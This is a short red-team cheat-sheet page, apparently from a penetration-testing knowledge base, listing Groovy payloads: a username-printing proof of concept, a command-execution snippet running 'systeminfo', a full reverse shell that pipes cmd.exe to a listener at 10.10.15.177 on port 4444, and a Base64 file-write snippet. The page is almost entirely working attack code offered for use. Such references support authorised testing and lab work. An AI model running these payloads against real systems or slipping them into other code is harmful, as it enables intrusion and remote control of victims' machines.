Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SHELLS / PAYLOADS

GROOVY

POC

println System.getProperty("user.name")

RCE

def command = "systeminfo"
def process = command.execute()
process.waitFor()

# OUTPUT
println "Output: ${process.text}"
# OR
return process.text

Revshell

String host="10.10.15.177";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Write To File B64

def b64 = "SGVsbG8gZnJvbSBHcm9vdnkK"   // example Base64
def data = b64.decodeBase64()
new File("/tmp/poc.txt").bytes = data
println "Wrote ${data.length} bytes"